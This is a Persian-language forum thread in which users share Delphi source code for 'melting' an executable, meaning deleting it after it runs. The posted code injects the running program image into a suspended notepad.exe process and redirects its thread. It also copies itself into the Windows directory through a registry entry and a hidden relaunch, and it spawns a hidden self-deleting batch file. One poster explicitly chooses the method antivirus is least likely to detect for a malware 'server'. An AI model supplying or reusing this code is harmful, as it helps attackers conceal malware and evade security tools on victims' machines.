melt after install

[FarhadShafaq]

مي شه روش هاي melt فايل رو بعد از اجرا بگين ؟ لطفا.مرسي

[lord_viper]

این یک روش melt با استفاده از injection می باشد

کد:

program Inj;

uses
  Windows;

var
  sBuff:    array[0..255] of Char;

{$R *.res}

procedure MeltProc();
begin
  Sleep(500);
  DeleteFile(sBuff);
end;

function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO:  TStartupInfo;
  PROCINFO:   TProcessInformation;
  pFunc:      Pointer;
  dSize:      DWORD;
  pInjected:  Pointer;
  dWritten:   DWORD;
  CONTEXT:    TContext;
  hMod:       THandle;
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
begin
  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
  STARTINFO.cb := SizeOf(TStartupInfo);
  if CreateProcess(nil, PChar(szProcessName),  nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
  begin
    hMod := GetModuleHandle(nil);
    CopyMemory(@IDH, Pointer(hMod), 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        dSize := INH.OptionalHeader.SizeOfImage;
        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
        CONTEXT.ContextFlags := CONTEXT_FULL;
        GetThreadContext(PROCINFO.hThread, CONTEXT);
        CONTEXT.Eip := DWORD(pFunction);
        SetThreadContext(PROCINFO.hThread, CONTEXT);
        ResumeThread(PROCINFO.hThread);
      end;                
    end;
  end;
end;

procedure MeltFile();
begin
  GetModuleFileName(0, sBuff, 256);
  InjectCode('notepad.exe', @MeltProc);
end;

begin
  MeltFile;
end.

[veyskarami]

ملت سرور از طریق اینجکشن خیلی روش قشنگیه ولی آنتی خیلی به این چیزا گیر میده قبلا تست کردم واسه همین بهتره از روشی که غیرقابل شناسایی تره استفاده بشه.
ممنون مبین جان.

کد:

program melt;



uses
windows;

var
theoldfile,ournewfile:string;


function ShellExecuteA(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): HINST; stdcall; external 'shell32.dll';

function WriteToReg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;


Function ReadFromReg(Key:HKEY;Path:string;Value,Default:string):string;
Var
  Handle:HKEY;
  RegType:integer;
  DataSize:integer;
begin
  Result:=Default;
  if (RegOpenKeyEx(Key,pchar(Path),0,KEY_ALL_ACCESS,Handle)=ERROR_SUCCESS) then begin
   if RegQueryValueEx(Handle,pchar(Value),nil,@RegType,nil,@DataSize)=ERROR_SUCCESS then begin
    SetLength(Result,Datasize);
    RegQueryValueEx(Handle,pchar(Value),nil,@RegType,PByte(pchar(Result)),@DataSize);
    SetLength(Result,Datasize-1);
   end;
   RegCloseKey(Handle);
  end;
end;


function getwindir():string;
var
windir:array [0..1024] of char;
begin
  getwindowsdirectory(windir,56);
  result:=string(windir)+'\';
end;


begin

theoldfile:=readfromreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld','DIDNT FIND ANYTHING') ;
ournewfile:=getwindir+'copyofMelt.exe';


if paramstr(0) <> ournewfile  then begin

deletefile(pchar(theoldfile));



writetoreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld',paramstr(0));


Copyfile(pchar(paramstr(0)),pchar(ournewfile),false);


shellexecuteA(0,nil,pchar(OurNewFile),nil,nil,0);
halt(0)
end

else begin
deletefile(pchar(theoldfile));
end;


while true do sleep(1000);

end.

[lord_viper]

این هم یک روش دیگه

کد:

procedure DeleteEXE;

  function GetTmpDir: string;
  var
    pc: PChar;
  begin
    pc := StrAlloc(MAX_PATH + 1);
    GetTempPath(MAX_PATH, pc);
    Result := string(pc);
    StrDispose(pc);
  end;

  function GetTmpFileName(ext: string): string;
  var
    pc: PChar;
  begin
    pc := StrAlloc(MAX_PATH + 1);
    GetTempFileName(PChar(GetTmpDir), 'uis', 0, pc);
    Result := string(pc);
    Result := ChangeFileExt(Result, ext);
    StrDispose(pc);
  end;
  
var
  batchfile: TStringList;
  batchname: string;
begin
  batchname := GetTmpFileName('.bat');
  FileSetAttr(ParamStr(0), 0);
  batchfile := TStringList.Create;
  with batchfile do
  begin
    try
      Add(':Label1');
      Add('del "' + ParamStr(0) + '"');
      Add('if Exist "' + ParamStr(0) + '" goto Label1');
      Add('rmdir "' + ExtractFilePath(ParamStr(0)) + '"');
      Add('del ' + batchname);
      SaveToFile(batchname);
      ChDir(GetTmpDir);
      ShowMessage('Uninstalling program...');
      WinExec(PChar(batchname), SW_HIDE);
    finally
      batchfile.Free;
    end;
    Halt;
  end;
end;